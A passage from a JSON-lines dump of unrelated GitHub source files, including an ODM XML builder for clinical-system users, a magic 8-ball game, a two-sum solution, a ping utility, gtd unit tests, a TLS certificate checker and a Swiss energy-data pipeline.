Name=self.name)\n if self.location_type:\n params.update(dict(LocationType=self.location_type.value))\n # mixins\n self.mixin()\n self.mixin_params(params)\n builder.start(\"Location\", params)\n for mdv in self.metadata_versions:\n mdv.build(builder)\n builder.end(\"Location\")\n\n def __lshift__(self, other):\n \"\"\"Override << operator\"\"\"\n if not isinstance(other, (MetaDataVersionRef,)):\n raise ValueError('{0} cannot accept a {1} as a child element'.format(self.__class__.__name__,\n other.__class__.__name__))\n\n self.set_list_attribute(other, MetaDataVersionRef, 'metadata_versions')\n\n return other\n\n\nclass Address(ODMElement):\n \"\"\"\n The user's postal address.\n \"\"\"\n def __init__(self, street_names=None, city=None, state_prov=None, country=None, postal_code=None, other_text=None):\n \"\"\"\n :param list(Address) street_names: User street names \n :param City city: User City\n :param StateProv state_prov: User State or Provence\n :param Country country: User City\n :param PostalCode postal_code: User City\n :param OtherText other_text: User Other Text\n \"\"\"\n super(Address, self).__init__()\n self.street_names = street_names or []\n self.city = city\n self.state_prov = state_prov\n self.country = country\n self.postal_code = postal_code\n self.other_text = other_text\n\n def build(self, builder):\n \"\"\"Build XML by appending to builder\"\"\"\n params = dict()\n builder.start(self.__class__.__name__, params)\n for street in self.street_names:\n street.build(builder)\n # build the children\n for child in ('city', 'country', 'state_prov', 'postal_code', 'other_text'):\n if getattr(self, child) is not None:\n getattr(self, child).build(builder)\n builder.end(self.__class__.__name__)\n\n def __lshift__(self, other):\n \"\"\"Override << operator\"\"\"\n if not isinstance(other, (StreetName, City, StateProv, Country, PostalCode, OtherText,)):\n raise ValueError('{0} cannot accept a {1} as a child element'.format(self.__class__.__name__,\n other.__class__.__name__))\n self.set_list_attribute(other, StreetName, 'street_names')\n self.set_single_attribute(other, Country, 'country')\n self.set_single_attribute(other, City, 'city')\n self.set_single_attribute(other, StateProv, 'state_prov')\n self.set_single_attribute(other, PostalCode, 'postal_code')\n self.set_single_attribute(other, OtherText, 'other_text')\n return other\n\n\nclass User(ODMElement):\n \"\"\"\n Information about a specific user of a clinical data collection system. This may be an investigator, a CRA, or \n data management staff. 
Study subjects are not users in this sense.\n \"\"\"\n\n def __init__(self, oid, user_type=None, login_name=None, display_name=None, full_name=None,\n first_name=None, last_name=None,\n organisation=None, addresses=[], emails=[], phones=[], locations=[]):\n \"\"\"\n :param str oid: \n :param rwslib.builder_constants.UserType user_type: User Type\n :param LoginName login_name: User Login Name - see :class:`LoginName`\n :param DisplayName display_name: User Display Name - see :class:`DisplayName`\n :param FullName full_name: User Full Name - see :class:`FullName` \n :param FirstName first_name: User First Name - see :class:`FirstName`\n :param LastName last_name: User Last Name - see :class:`LastName`\n :param Organisation organisation: User Organisation - see :class:`Organisation`\n :param list(Address) addresses: User Address - see :class:`Address`\n :param list(Email) emails: User Email - see :class:`Email`\n :param list(Phone) phones: User Phone - see :class:`Phone`\n :param list(LocationRef) locations: Locations for User - see :class:`LocationRef`\n \"\"\"\n super(User, self).__init__()\n self.login_name = login_name\n self.display_name = display_name\n self.full_name = full_name\n self.first_name = first_name\n self.last_name = last_name\n self.organisation = organisation\n self.addresses = addresses\n self.emails = emails\n self.phones = phones\n self.locations = locations\n self._user_type = None\n if user_type:\n self.user_type = user_type\n self.oid = oid\n\n @property\n def user_type(self):\n \"\"\"\n User Type\n :return: \n \"\"\"\n return self._user_type\n\n @user_type.setter\n def user_type(self, value):\n if not isinstance(value, (UserType,)):\n raise ValueError(\"{} is not a UserType\".format(type(value)))\n self._user_type = value\n\n def build(self, builder):\n \"\"\"Build XML by appending to builder\"\"\"\n params = dict(OID=self.oid)\n if self.user_type:\n params.update(dict(UserType=self.user_type.value))\n builder.start(self.__class__.__name__, params)\n # build the children\n for child in ('login_name', 'display_name', 'full_name', 'first_name', 'last_name',\n 'organisation'):\n if getattr(self, child) is not None:\n getattr(self, child).build(builder)\n for address in self.addresses:\n address.build(builder)\n for email in self.emails:\n email.build(builder)\n for phone in self.phones:\n phone.build(builder)\n for location in self.locations:\n location.build(builder)\n builder.end(self.__class__.__name__)\n\n def __lshift__(self, other):\n \"\"\"Override << operator\"\"\"\n if not isinstance(other, (LoginName, DisplayName, FullName, FirstName, LastName, Organization,\n Address, Email, Phone, LocationRef)):\n raise ValueError('{0} cannot accept a {1} as a child element'.format(self.__class__.__name__,\n other.__class__.__name__))\n self.set_list_attribute(other, Email, 'emails')\n self.set_list_attribute(other, Address, 'addresses')\n self.set_list_attribute(other, LocationRef, 'locations')\n self.set_list_attribute(other, Phone, 'phones')\n self.set_single_attribute(other, LoginName, 'login_name')\n self.set_single_attribute(other, DisplayName, 'display_name')\n self.set_single_attribute(other, FullName, 'full_name')\n self.set_single_attribute(other, FirstName, 'first_name')\n self.set_single_attribute(other, LastName, 'last_name')\n self.set_single_attribute(other, Organization, 'organisation')\n return other\n\n\nclass SimpleChildElement(ODMElement):\n \"\"\"\n Generic Element, for elements we're not ready to flesh out in the builders\n \"\"\"\n def __init__(self, 
text):\n self.text = text\n\n def build(self, builder):\n \"\"\"\n Build the element\n :param builder: \n :return: \n \"\"\"\n builder.start(self.__class__.__name__, {})\n builder.data(self.text)\n builder.end(self.__class__.__name__)\n\n\nclass LoginName(SimpleChildElement):\n \"\"\"\n The user's login identification.\n \"\"\"\n\n\nclass DisplayName(SimpleChildElement):\n \"\"\"\n A short displayable name for the user.\n \"\"\"\n\n\nclass FullName(SimpleChildElement):\n \"\"\"\n The user's full formal name.\n \"\"\"\n\n\nclass FirstName(SimpleChildElement):\n \"\"\"\n The user's initial given name or all given names.\n \"\"\"\n\n\nclass LastName(SimpleChildElement):\n \"\"\"\n The user's surname (family name).\n \"\"\"\n\n\nclass Organization(SimpleChildElement):\n \"\"\"\n The user's organization.\n \"\"\"\n\n\nclass Email(SimpleChildElement):\n \"\"\"\n The user's email address.\n \"\"\"\n\n\nclass Phone(SimpleChildElement):\n \"\"\"\n The user's voice phone number.\n \"\"\"\n\n\nclass StreetName(SimpleChildElement):\n \"\"\"\n The street address part of a user's postal address.\n \"\"\"\n\n\nclass City(SimpleChildElement):\n \"\"\"\n The city name part of a user's postal address.\n \"\"\"\n\n\nclass StateProv(SimpleChildElement):\n \"\"\"\n The state or province name part of a user's postal address.\n \"\"\"\n\n\nclass Country(ODMElement):\n \"\"\"\n The country name part of a user's postal address. This must be represented by an ISO 3166 two-letter country code.\n \"\"\"\n def __init__(self, country_code):\n super(Country, self).__init__()\n # TODO: Validate this\n self.country_code = country_code\n\n def build(self, builder):\n \"\"\"\n Build this element\n :param builder: \n :return: \n \"\"\"\n builder.start(self.__class__.__name__, {})\n builder.data(self.country_code)\n builder.end(self.__class__.__name__)\n\n\nclass PostalCode(SimpleChildElement):\n \"\"\"\n The postal code part of a user's postal address.\n \"\"\"\n\n\nclass OtherText(SimpleChildElement):\n \"\"\"\n Any other text needed as part of a user's postal address.\n \"\"\"\n\n","repo_name":"mdsol/rwslib","sub_path":"rwslib/builders/admindata.py","file_name":"admindata.py","file_ext":"py","file_size_in_byte":13599,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"21"} +{"seq_id":"38993392959","text":"from random import *\n\ndef continue_game(): # Предложение продолжить игру\n ans = input('Хотите продолжить (\"д\"/\"н\")?\\n')\n while True:\n if ans not in ('y', 'д', 'n', 'н'):\n ans = input('Вроде, взрослый человек, а на простой вопрос ответить не может...\\nПродолжим (\"д\"/\"н\")?\\n')\n elif ans in ('n', 'н'):\n print('Возвращайся если возникнут вопросы!')\n return False\n else:\n return True\n\nanswers = [\"Бесспорно\", \"Мне кажется - да\", \"Пока неясно, попробуй снова\", \"Даже не думай\",\n \"Предрешено\", \"Вероятнее всего\", \"Спроси позже\", \"Мой ответ - нет\",\n \"Никаких сомнений\", \"Хорошие перспективы\", \"Лучше не рассказывать\", \"По моим данным - нет\",\n \"Можешь быть уверен в этом\", \"Да\", \"Сконцентрируйся и спроси опять\", \"Весьма сомнительно\"]\n\nprint(\"Привет Мир, я магический шар, и я знаю ответ на любой твой вопрос.\")\nname = input(\"Как тебя зовут? 
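
Editor's note on User.__init__ in admindata.py above: `addresses=[], emails=[], phones=[], locations=[]` are mutable defaults, created once and shared by every User built without those arguments, so appending via `user << email` on one instance leaks into the others. A minimal sketch of the safe idiom (the real class takes many more parameters):

class UserSketch:
    def __init__(self, oid, addresses=None, emails=None):
        self.oid = oid
        # One fresh list per instance, instead of one list shared by the signature.
        self.addresses = addresses if addresses is not None else []
        self.emails = emails if emails is not None else []

a, b = UserSketch("U1"), UserSketch("U2")
a.emails.append("someone@example.com")
assert b.emails == []  # holds here; fails with emails=[] in the signature
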
\\n\")\nprint(\"Привет\", name + '!')\n\nwhile True:\n print(name + ' каков ваш вопрос?')\n issie = input()\n response = choice(answers)\n print(response)\n if continue_game():\n continue\n else:\n break","repo_name":"Alex10885/pythonProject","sub_path":"Magic_Ball.py","file_name":"Magic_Ball.py","file_ext":"py","file_size_in_byte":1614,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"375373846","text":"from __future__ import annotations\n\nimport json\nfrom importlib import util\nfrom typing import TYPE_CHECKING, Protocol\n\nfrom absl import flags, logging\n\nif util.find_spec(\"ml_collections\"):\n from ml_collections import ConfigDict\n\nif TYPE_CHECKING:\n from absl_extra.notifier import BaseNotifier\n\n class CallbackFn(Protocol):\n def __call__(\n self,\n name: str,\n *,\n notifier: BaseNotifier,\n config: ConfigDict = None,\n ) -> None:\n ...\n\n\ndef log_absl_flags_callback(*args, **kwargs):\n logging.info(\"-\" * 50)\n flags_dict = flags.FLAGS.flag_values_dict()\n for k, v in flags_dict.items():\n if \"config\" in k:\n flags_dict[\"config\"] = flags_dict[\"config\"].to_dict()\n logging.info(f\"ABSL flags: {json.dumps(flags_dict, sort_keys=True, indent=4)}\")\n\n\ndef log_tensorflow_devices(*args, **kwargs):\n \"\"\"Logs the TensorFlow devices available in the system.\"\"\"\n import tensorflow as tf\n\n logging.info(f\"TF devices = {tf.config.list_physical_devices()}\")\n\n\ndef log_jax_devices(*args, **kwargs):\n \"\"\"Logs the JAX devices available in the system.\"\"\"\n import jax\n\n logging.info(f\"JAX devices = {jax.devices()}\")\n\n\ndef log_startup_callback(name: str, *, notifier: BaseNotifier, **kwargs):\n \"\"\"Notify about on execution begin.\"\"\"\n notifier.notify_task_started(name)\n\n\ndef log_shutdown_callback(name: str, *, notifier: BaseNotifier, **kwargs):\n \"\"\"Notify on task execution end.\"\"\"\n notifier.notify_task_finished(name)\n\n\nDEFAULT_INIT_CALLBACKS = [\n log_absl_flags_callback,\n log_startup_callback,\n]\nDEFAULT_POST_CALLBACK = [\n log_shutdown_callback,\n]\n\nif util.find_spec(\"tensorflow\"):\n DEFAULT_INIT_CALLBACKS.append(log_tensorflow_devices)\nif util.find_spec(\"jax\") and util.find_spec(\"jaxlib\"):\n DEFAULT_INIT_CALLBACKS.append(log_jax_devices)\n","repo_name":"aaarrti/absl_extra","sub_path":"absl_extra/callbacks.py","file_name":"callbacks.py","file_ext":"py","file_size_in_byte":1881,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42985772681","text":"class Solution:\n def twoSum(self, nums: List[int], target: int) -> List[int]:\n seen={}\n for i,num in enumerate(nums):\n if target-num in seen:\n return ([i,seen[target-num]])\n else:\n seen[num]=i\n\"\"\"\nGiven an array of integers nums and an integer target, return indices of the two numbers such that they add up to target.\n\nYou may assume that each input would have exactly one solution, and you may not use the same element twice.\n\nYou can return the answer in any order.\n\n \n\nExample 1:\n\nInput: nums = [2,7,11,15], target = 9\nOutput: [0,1]\nExplanation: Because nums[0] + nums[1] == 9, we return [0, 1].\nExample 2:\n\nInput: nums = [3,2,4], target = 6\nOutput: [1,2]\nExample 3:\n\nInput: nums = [3,3], target = 6\nOutput: [0,1]\n \n\nConstraints:\n\n2 <= nums.length <= 104\n-109 <= nums[i] <= 109\n-109 <= target <= 109\nOnly one valid answer exists.\n\"\"\"\n\n\"\"\"\nDifferent approaches:\n1. 
Brute force method iterating over arrays with two variables.\n2. Sorting and two-pointers technique\n Let an array be {1, 4, 45, 6, 10, -8} and sum to find be 16\n After sorting the array \n A = {-8, 1, 4, 6, 10, 45}\n Now, increment ‘l’ when the sum of the pair is less than the required sum and decrement ‘r’ when the sum of the pair is more than the required sum. \n This is because when the sum is less than the required sum then to get the number which could increase the sum of pair, start moving from left to right(also sort the array) thus “l++” and vice versa.\n Initialize l = 0, r = 5 \n A[l] + A[r] ( -8 + 45) > 16 => decrement r. Now r = 4 \n A[l] + A[r] ( -8 + 10) increment l. Now l = 1 \n A[l] + A[r] ( 1 + 10) increment l. Now l = 2 \n A[l] + A[r] ( 4 + 10) increment l. Now l = 3 \n A[l] + A[r] ( 6 + 10) == 16 => Found candidates (return 1)\n3. Hashing\n Follow the steps below to solve the problem:\n\n Initialize an empty hash table s.\n Do the following for each element A[i] in A[] \n If s[x – A[i]] is set then print the pair (A[i], x – A[i])\n Insert A[i] into s.\n\"\"\"\n","repo_name":"DoSendToDileep/blind75-leetcode-questions","sub_path":"TwoSum.py","file_name":"TwoSum.py","file_ext":"py","file_size_in_byte":2075,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"31790971841","text":"\"\"\"\nauthor : Lee Sang Min\ngithub : https://github.com/sangm1n\ne-mail : dltkd96als@naver.com\n\ntitle : 경쟁적 전염\ndescription : BFS\n\"\"\"\n\nfrom collections import deque\n\n\ndef spread(q, arr, S):\n dx = [-1, 1, 0, 0]\n dy = [0, 0, -1, 1]\n\n while q:\n virus, x, y, time = q.popleft()\n\n if time == S:\n break\n\n for i in range(4):\n nx, ny = x + dx[i], y + dy[i]\n\n if 0 <= nx < len(arr) and 0 <= ny < len(arr) and arr[nx][ny] == 0:\n arr[nx][ny] = virus\n q.append((arr[nx][ny], nx, ny, time + 1))\n\n\nN, K = map(int, input().split())\ncylinder = [list(map(int, input().split())) for _ in range(N)]\nS, X, Y = map(int, input().split())\n\ntmp = []\nfor i in range(N):\n for j in range(N):\n if cylinder[i][j] != 0:\n tmp.append((cylinder[i][j], i, j, 0))\n\ntmp.sort()\nq = deque(tmp)\n\nspread(q, cylinder, S)\nprint(cylinder[X-1][Y-1])\n","repo_name":"sangm1n/problem-solving","sub_path":"BOJ/18405.py","file_name":"18405.py","file_ext":"py","file_size_in_byte":926,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"28870099994","text":"from packetweaver.core import ns\nimport subprocess\nimport os\n\n\nclass Ability(ns.AbilityBase):\n _info = ns.AbilityInfo(\n name='Ping a target',\n )\n\n _option_list = [\n ns.IpOpt('ip_dst', default='8.8.8.8', comment='Ping Destination IP'),\n ]\n\n def main(self):\n cmd = '/bin/ping6' if self.ip_dst.find(':') != -1 else '/bin/ping'\n rc = subprocess.call(\n [cmd, '-c 1', '-w 1', self.ip_dst],\n stdout=os.open('/dev/null', os.O_WRONLY),\n stderr=os.open('/dev/null', os.O_WRONLY)\n )\n\n if rc == 0:\n self._view.success('{} is UP'.format(self.ip_dst))\n else:\n self._view.warning('{} is DOWN'.format(self.ip_dst))\n","repo_name":"ANSSI-FR/packetweaver","sub_path":"pw-pkg-sstic/abilities/ping.py","file_name":"ping.py","file_ext":"py","file_size_in_byte":718,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"21"} +{"seq_id":"13358085701","text":"import os\nimport sys\n\nfrom loguru import logger\n\n\ncached_stdout = sys.stdout\n\n\ndef configure_loguru(verbose: bool):\n logger.remove()\n logger.add(\n 
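
Editor's note: the docstring in TwoSum.py above describes the sort-and-two-pointers approach in prose only, and glosses over one wrinkle — sorting loses the original indices the problem asks for. A sketch that sorts index positions instead of values so they stay recoverable:

def two_sum_two_pointers(nums, target):
    order = sorted(range(len(nums)), key=lambda i: nums[i])  # indices by value
    l, r = 0, len(nums) - 1
    while l < r:
        s = nums[order[l]] + nums[order[r]]
        if s == target:
            return [order[l], order[r]]
        if s < target:
            l += 1   # need a bigger value: move the left pointer right
        else:
            r -= 1   # need a smaller value: move the right pointer left
    return []

print(two_sum_two_pointers([3, 2, 4], 6))  # [1, 2]
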
cached_stdout,\n format='{level} {time:HH:mm:ss} {message}',\n level='DEBUG' if verbose else 'INFO'\n )\n\n\ndef human_readable_size(size: int):\n if size < 1024:\n return f'{size} bytes'\n\n if size < 1024 ** 2:\n return f'{size / 1024:.02f} KiB'\n\n return f'{size / 1024 ** 2:.02f} MiB'\n\n\n# img2pdf abuses debug logging by using print\n# This is a way to temporarily silence it\nclass SilencePrint:\n def __enter__(self):\n sys.stdout = open(os.devnull, 'w')\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n sys.stdout.close()\n sys.stdout = cached_stdout\n","repo_name":"kcroker/dpsprep","sub_path":"dpsprep/logging.py","file_name":"logging.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"en","doc_type":"code","stars":154,"dataset":"github-code","pt":"21"} +{"seq_id":"32638485935","text":"from OpenGL.GLUT import *\nfrom OpenGL.GLU import *\nfrom OpenGL.GL import *\nimport sys\n\n\ndef resize(width,height):\n glViewport(0,0,width,height)\n glMatrixMode( GL_PROJECTION )\n glLoadIdentity()\n glOrtho(-5,5, -5,5, 2,12)\n gluLookAt( 0,0,5, 0,0,0, 0,1,0 )\n glMatrixMode( GL_MODELVIEW )\n \n\n\n\ndef display():\n glClear( GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT )\n glColor3d(1,1,1)\n glutSolidSphere(2, 50, 50)\n glutSwapBuffers()\n\n\n\n\n\ndef main():\n pos = [3,3,3,1]\n color = [1,1,1,1]\n sp1 = [1,1,1,1]\n sp2 = [0.1,0.1,0.1,1]\n sp3 = [0.5,0.5,0.5,0.5]\n mat_specular = [1,1,1,1]\n glutInit(sys.argv)\n glutInitDisplayMode(GLUT_DOUBLE | GLUT_RGB | GLUT_DEPTH)\n glutInitWindowSize(700,700)\n glutCreateWindow(b'rotate_light')\n glutDisplayFunc(display)\n glutReshapeFunc(resize)\n\n \n glEnable(GL_DEPTH_TEST)\n\n glEnable(GL_COLOR_MATERIAL)\n glEnable(GL_LIGHTING)\n glEnable(GL_LIGHT3)\n glEnable(GL_LIGHT5)\n #glEnable(GL_LIGHT6)\n\n glLightfv(GL_LIGHT3, GL_SPECULAR, sp1)\n glLightfv(GL_LIGHT5, GL_SPECULAR, sp2)\n #glLightfv(GL_LIGHT6, GL_SPECULAR, sp3)\n\n\n color[1]=color[2]=0\n glLightfv(GL_LIGHT3, GL_DIFFUSE, color)\n\n color[0]=0\n color[1]=1\n glLightfv(GL_LIGHT5, GL_DIFFUSE, color)\n\n color[1]=0\n #color[2]=1\n #glLightfv(GL_LIGHT6, GL_DIFFUSE, color)\n\n glLightfv(GL_LIGHT3, GL_POSITION, pos)\n pos[0] = -3\n glLightfv(GL_LIGHT5, GL_POSITION, pos)\n #pos[0]=0;pos[1]=-3\n #glLightfv(GL_LIGHT6, GL_POSITION, pos)\n\n glMaterialfv(GL_FRONT, GL_SPECULAR, mat_specular)\n glMaterialf(GL_FRONT, GL_SHININESS, 128.0)\n glutMainLoop()\n\nmain()\n","repo_name":"SeemerGG/OpenGL_lab","sub_path":"IT_6_material_prop/IT_6.py","file_name":"IT_6.py","file_ext":"py","file_size_in_byte":1639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"8179725413","text":"from unittest import TestCase\nfrom os.path import join\n\nimport pytest\nfrom gtd.text import PhraseMatcher\nfrom gtd.utils import FileMemoized, SimpleExecutor, as_batches, Failure, NestedDict, EqualityMixinSlots, \\\n memoize_with_key_fxn, DictMemoized\n\n\ndef test_as_batches():\n items = [0, 1, 2, 3, 4, 5, 6]\n assert list(as_batches(items, 2)) == [[0, 1], [2, 3], [4, 5], [6]]\n\n\ndef test_file_memoized_represent_args(tmpdir):\n path = str(tmpdir.join('fxn'))\n\n fm = FileMemoized(None, path, None, None)\n key = fm._cache_key(['a', 'b'], {'c': 2, 'd': 'e'})\n assert key == join(path, 'a_b_c=2_d=e.txt')\n key = fm._cache_key([], {'c': 2, 'd': 'e'})\n assert key == join(path, 'c=2_d=e.txt')\n key = fm._cache_key([], dict())\n assert key == join(path, 'NO_KEY.txt')\n\n\nclass TestUtils(TestCase):\n\n def test_phrase_matcher(self):\n phrases = [[1, 2, 3], [1, ], 
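
Editor's note: SilencePrint in dpsprep's logging.py above hand-rolls a stdout swap; the standard library ships the same behaviour as contextlib.redirect_stdout, which restores whatever stream was active on entry (SilencePrint always restores the module-level cached_stdout, which breaks under nesting):

import contextlib
import os

with open(os.devnull, "w") as devnull, contextlib.redirect_stdout(devnull):
    print("img2pdf chatter goes nowhere")  # swallowed, as inside SilencePrint
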
[2, ], [2, 4]]\n not_phrases = [[1, 2], [4, ]]\n\n pm = PhraseMatcher(phrases)\n\n for phrase in phrases:\n self.assertTrue(pm.has_phrase(phrase))\n\n for phrase in not_phrases:\n self.assertFalse(pm.has_phrase(phrase))\n\n tokens = [1, 2, 1, 2, 3, 2, 3, 2, 4]\n\n matches = pm.match(tokens)\n\n correct = [((1,), 0, 1),\n ((2,), 1, 2),\n ((1,), 2, 3),\n ((2,), 3, 4),\n ((1, 2, 3), 2, 5),\n ((2,), 5, 6),\n ((2,), 7, 8),\n ((2, 4), 7, 9)]\n\n self.assertEqual(matches, correct)\n\n\nclass TestSimpleExecutor(object):\n\n def test_context_manager(self):\n fxn = lambda x: 2 * x\n with SimpleExecutor(fxn, max_workers=2) as ex:\n for i, x in enumerate(range(10)):\n ex.submit(i, x)\n results = {k: v for k, v in ex.results()}\n\n correct = {k: 2 * k for k in range(10)}\n assert results == correct\n\n\nclass TestFailure(object):\n def test_eq(self):\n f0 = Failure()\n f1 = Failure()\n f2 = Failure(uid=1)\n f3 = Failure(uid=1, message='different message')\n assert f0 != f1 # different id\n assert f1 != f2 # different id\n assert f2 == f3 # same id\n\n\nclass TestNestedDict(object):\n @pytest.fixture\n def normal_dict(self):\n return {\n 'a': 1,\n 'b': {\n 'c': 2,\n 'd': 3,\n },\n }\n\n @pytest.fixture\n def nested_dict(self, normal_dict):\n return NestedDict(normal_dict)\n\n def test_as_dict(self, nested_dict, normal_dict):\n assert nested_dict.as_dict() == normal_dict\n\n def test_iter(self, nested_dict):\n assert set(nested_dict) == {'a', 'b'}\n\n def test_len(self, nested_dict):\n assert len(nested_dict) == 3\n\n def test_nested(self):\n d = NestedDict()\n d.set_nested(('a', 'b', 'c'), 1)\n d.set_nested(('a', 'd'), 2)\n\n assert d.as_dict() == {\n 'a': {\n 'b': {\n 'c': 1\n },\n 'd': 2,\n }\n }\n assert d.get_nested(('a', 'd')) == 2\n\n with pytest.raises(KeyError):\n d.get_nested(('a', 'd', 'e'))\n\n def test_leaves(self, nested_dict):\n assert set(nested_dict.leaves()) == {1, 2, 3}\n\n\nclass DummySlotsObject(EqualityMixinSlots):\n __slots__ = ['a', 'b', 'c']\n\n def __init__(self, a, b, c=None):\n self.a = a\n self.b = b\n\n if c:\n self.c = c\n\n\nclass TestEqualityMixinSlot(object):\n def test_equality(self):\n d1 = DummySlotsObject(5, 10)\n d2 = DummySlotsObject(5, 10)\n assert d1 == d2\n\n d3 = DummySlotsObject(5, 10, 20)\n d4 = DummySlotsObject(5, 11)\n assert d1 != d3\n assert d1 != d4\n\n\nclass MemoizedClass(object):\n def __init__(self):\n self.calls = 0\n\n @memoize_with_key_fxn(lambda self, a, b: b) # key fxn only uses b\n def fxn_to_memoize(self, a, b):\n self.calls += 1\n return a + b\n\n\nclass MemoizedClass2(object):\n def __init__(self):\n self.calls = 0\n\n def fxn(self, a, b):\n self.calls += 1\n return a + b\n\n fxn_memoized = DictMemoized(fxn)\n\n\nclass TestDictMemoized(object):\n def test(self):\n mc = MemoizedClass2()\n result = mc.fxn_memoized('a', 'b')\n assert result == 'ab'\n assert mc.calls == 1\n\n result2 = mc.fxn_memoized('a', 'b')\n assert result2 == 'ab'\n assert mc.calls == 1\n\n result2 = mc.fxn_memoized('b', 'b')\n assert result2 == 'bb'\n assert mc.calls == 2\n\n\nclass TestMemoizeWithKey(object):\n def test_caching(self):\n mc = MemoizedClass()\n result = mc.fxn_to_memoize('hey', 'there')\n assert mc.calls == 1\n assert result == 'heythere'\n\n # returns cached result\n result2 = mc.fxn_to_memoize('hey', 'there')\n assert result2 == 'heythere'\n assert mc.calls == 1\n\n # computes new result\n result3 = mc.fxn_to_memoize('hey', 'what')\n assert mc.calls == 2\n\n # only caches on 2nd arg, 'there', not 'you'\n result4 = mc.fxn_to_memoize('you', 'there')\n 
assert result4 == 'heythere'\n assert mc.calls == 2","repo_name":"microsoft/ContextualSP","sub_path":"lemon/executor/gtd/tests/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":5257,"program_lang":"python","lang":"en","doc_type":"code","stars":348,"dataset":"github-code","pt":"21"} +{"seq_id":"71047701814","text":"#!/usr/bin/env python3\n\nfrom sys import argv\nfrom ssl import create_default_context\nfrom socket import create_connection\nfrom pprint import pprint\n\n\ndef main():\n\n if len(argv) > 1:\n hostname = argv[1]\n else:\n quit(f\"Usage: {argv[0]} \")\n\n info = {'status': None, 'tls_version': \"UNKNOWN\", 'cert_details': None}\n\n try:\n ssl_context = create_default_context()\n sock = create_connection((hostname, \"443\"), timeout=3)\n ssock = ssl_context.wrap_socket(sock, server_hostname=hostname)\n info['status'] = \"OK\"\n info['tls_version'] = ssock.version()\n info['cert_details'] = ssock.getpeercert()\n except Exception as e:\n quit(e)\n\n pprint(info)\n\n\nif __name__ == \"__main__\":\n\n main()\n","repo_name":"jeheyer/python-scripts","sub_path":"check_ssl.py","file_name":"check_ssl.py","file_ext":"py","file_size_in_byte":769,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"16488115896","text":"from energy_reporter import fetch_canton_and_commune_energy\nfrom swiss_boundaries import fetch_canton_and_commune_boundaries\nfrom swiss_population import fetch_population_data\nfrom helpers import write_json,WEBSITE_DATA_FILE_PATH\nimport os\nimport numpy as np\n\ndef merge_canton_datasets(cantons_geo,df_canton,pop_canton):\n cantons_geo_copy = cantons_geo.copy()\n df_canton = df_canton.set_index('canton_number')\n pop_canton = pop_canton.set_index('id')\n \n for i,canton in enumerate(cantons_geo_copy['features']):\n canton_nb = canton['properties']['canton_number']\n \n data_en = df_canton.loc[canton_nb]\n data_pop = pop_canton.loc[canton_nb]\n cantons_geo['features'][i]['properties']['energyreporter_date'] = ' '.join(str(x) for x in data_en['energyreporter_date'])\n cantons_geo['features'][i]['properties']['electric_car_share'] = ' '.join(str(x) for x in data_en['electric_car_share'])\n cantons_geo['features'][i]['properties']['renewable_heating_share'] = ' '.join(str(x) for x in data_en['renewable_heating_share'])\n cantons_geo['features'][i]['properties']['solar_potential_usage'] = ' '.join(str(x) for x in data_en['solar_potential_usage'])\n cantons_geo['features'][i]['properties']['renewable_heating_share_coverage'] = ' '.join(str(x) for x in data_en['renewable_heating_share_coverage'])\n cantons_geo['features'][i]['properties']['abbreviation'] = data_en['canton']\n \n cantons_geo['features'][i]['properties']['population'] = str(data_pop['pop'])\n return cantons_geo\n\ndef merge_communes_datasets(communes_geo,df_communes,pop_commune):\n cantons_geo_copy = communes_geo.copy()\n df_communes = df_communes.set_index('bfs_nr')\n pop_commune = pop_commune.set_index('id')\n \n for i,commune in enumerate(cantons_geo_copy['features']):\n commune_nb = commune['properties']['commune_number']\n if commune_nb in df_communes.index:\n data = df_communes.loc[commune_nb]\n communes_geo['features'][i]['properties']['energyreporter_date'] = ' '.join(str(x) for x in data['energyreporter_date'])\n communes_geo['features'][i]['properties']['electric_car_share'] = ' '.join(str(x) for x in data['electric_car_share'])\n communes_geo['features'][i]['properties']['renewable_heating_share'] = ' '.join(str(x) for x 
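
Editor's note: the tests in test_utils.py above pin down the contract of gtd.utils.memoize_with_key_fxn without showing its body — results are cached under key_fxn(*args), so ('you', 'there') reuses the entry stored for ('hey', 'there'). A minimal decorator consistent with those assertions; the real implementation may differ, e.g. by keeping a per-instance cache:

import functools

def memoize_with_key_fxn(key_fxn):
    def decorator(fxn):
        cache = {}
        @functools.wraps(fxn)
        def wrapper(*args, **kwargs):
            key = key_fxn(*args, **kwargs)  # the cache key ignores the other args
            if key not in cache:
                cache[key] = fxn(*args, **kwargs)
            return cache[key]
        return wrapper
    return decorator
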
in data['renewable_heating_share'])\n communes_geo['features'][i]['properties']['solar_potential_usage'] = ' '.join(str(x) for x in data['solar_potential_usage'])\n communes_geo['features'][i]['properties']['renewable_heating_share_coverage'] = ' '.join(str(x) for x in data['renewable_heating_share_coverage'])\n \n else:\n communes_geo['features'][i]['properties']['energyreporter_date'] = 'null'\n communes_geo['features'][i]['properties']['electric_car_share'] = 'null'\n communes_geo['features'][i]['properties']['renewable_heating_share'] = 'null'\n communes_geo['features'][i]['properties']['solar_potential_usage'] = 'null'\n communes_geo['features'][i]['properties']['renewable_heating_share_coverage'] = 'null'\n \n if commune_nb in pop_commune.index:\n data_pop = pop_commune.loc[commune_nb] \n communes_geo['features'][i]['properties']['population'] = str(data_pop['pop'])\n\n else:\n communes_geo['features'][i]['properties']['population'] = 'null'\n\n return communes_geo\n\ndef convert_file_to_topo_json(file_path,new_file_path):\n os.system('geo2topo ' + file_path + ' > ' + new_file_path + ' --quantization 1000')\n os.system('rm '+file_path)\n\ndef pipeline_create_data():\n cantons_geo,communes_geo = fetch_canton_and_commune_boundaries()\n df_nationality,df_canton,df_municipality = fetch_canton_and_commune_energy()\n pop_canton,pop_commune = fetch_population_data()\n \n cantons 